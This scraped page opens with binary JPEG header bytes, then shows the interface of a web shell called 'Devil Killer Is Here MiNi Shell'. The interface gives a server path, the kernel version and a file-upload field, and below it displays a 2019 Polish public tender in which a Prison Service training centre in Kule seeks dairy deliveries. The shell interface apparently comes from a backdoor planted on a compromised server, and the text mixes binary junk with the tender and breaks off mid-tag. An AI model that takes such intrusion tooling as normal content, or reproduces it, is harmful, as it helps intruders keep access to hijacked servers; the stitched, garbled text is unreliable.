JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190312/523771-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 523771-N-2019 z dnia 2019-03-12 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Ośrodek Szkolenia Służby Więziennej w Kulach</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawy artykułów mleczarskich dla OSSW w Kulach oraz Oddziału Zamiejscowego w Sulejowie</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Ośrodek Szkolenia Służby Więziennej w Kulach</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">00067518100000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Kule</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">2</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">42-110</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Popów</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">034 3104030</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">dil_kule@sw.gov.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">034 3103653</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.sw.gov.pl </span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Ośrodek Szkolenia Służby Więziennej</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://www.zp.sw.gov.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">oferty należy złożyć w formie pisemnej do siedziby Zamawiającego</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Ośrodek Szkolenia Służby Więziennej w Kulach Kule 2, 42-110 Popów, Pokójnr 3 sekretariat pawilon "Liswarta"</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawy artykułów mleczarskich dla OSSW w Kulach oraz Oddziału Zamiejscowego w Sulejowie</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">OSK-DKW.2232.5.2019.MS </span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia na zadanie nr 1 są - dostawy artykułów mleczarskich dla OSSW w Kulachzadanie nr 1: L.P	Nazwa artykułu	j. m	Ilość1	Margaryna	kg	150.2	Serek homogenizowany z twarogu odtłuszczonego, typu "Danio" lub równoważny	kg	200.3	Mleko	l	1200.4	Mleko zagęszczone niesłodzone	kg	2.5	Mleko w kartonie 2% tłuszczu bez środków konserwujących	l	200.6	Śmietana	kg	300.7	Śmietanka do kawy	l	2.8	Masło	kg	800.9	Serek bez cukru ziarnisty, typu "Wiejski" lub równoważny	kg	250.10	Serek do chleba o różnych smakach, typu "Kanapkowy" lub równoważny	kg	180.11	Twaróg półtłusty	kg	700.12	Ser topiony kg	140.13	Ser feta	kg	50.14	Ser żółty, typu holenderskiego / Gouda lub Edamski/ lub równoważny kg	500.15	Ser żółty wędzony, typu "rolada ustrzycka" lub równoważny	kg	150.16	Serek homogenizowany z twarożku odtłuszczonego z witaminami, typu "Bakuś" lub równoważny	kg	150.17	Serek homogenizowany chudy kg	200.18	Jogurt naturalny bez cukru	kg	150.19	Jogurt owocowy	kg	400.Przedmiotem zamówienia na zadanie nr 2 są - dostawy artykułów mleczarskich dla OSSW w Kulach OZ Sulejów L.P	Nazwa artykułu	j. m	Ilość1	Margaryna	kg	452	Serek homogenizowany kg	1203	Deser mleczny	kg	1204	Pudding	kg	1205	Mleko l	15006	Śmietana	kg	2107	Masło kg	6008	Twaróg półtłusty	kg	1209	Twaróg sernikowy	kg	12010	Serek bez cukru ziarnisty	kg	20011	Serek do chleba	kg	9012	Serek włoski typu Capri lub równoważny	kg	4013	Ser topiony- krążki	kg	5014	Ser topiony- prostokąt	kg	6015	Ser topiony - plastry	kg	5016	Ser typu feta lub równoważny	kg	3017	Ser żółty typu gouda lub równoważny	kg	24018	Ser żółty z przyprawami pełnotłusty	kg	24019	Ser żółty typu salami lub równoważny	kg	24020	Ser żółty wędzony typu rolada ustrzycka lub równowazny	kg	24021	Ser żółty wędzony	kg	24022	Kefir	kg	2023	Jogurt naturalny	kg	21024	Jogurt owocowy	kg	12025	Jogurt owocowy pitny	l	12026	Maślanka	l	50</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">15500000-3</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15431100-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15511210-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15512000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15530000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15542100-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15542200-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15542300-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15544000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15551000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15551310-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15551320-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15551500-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15500000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15511200-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15542000-9</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">pln</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-03-30</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2020-03-30</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie określił warunków w tym zakresie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie określił warunków w tym zakresie</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Za spełniających ten warunek Zamawiający uzna wykonawców, którzy wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują dostawy artykułów mleczarskich, niezbędnym do wykazania spełniania warunku doświadczenia, przez co zamawiający rozumie realizację w okresie trzech ostatnich lat minimum dwóch dostaw dla jednej części zamówienia (o określonej wartości sumarycznej dla każdej z dwóch dostaw przewidzianej dla danego zadania).</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span 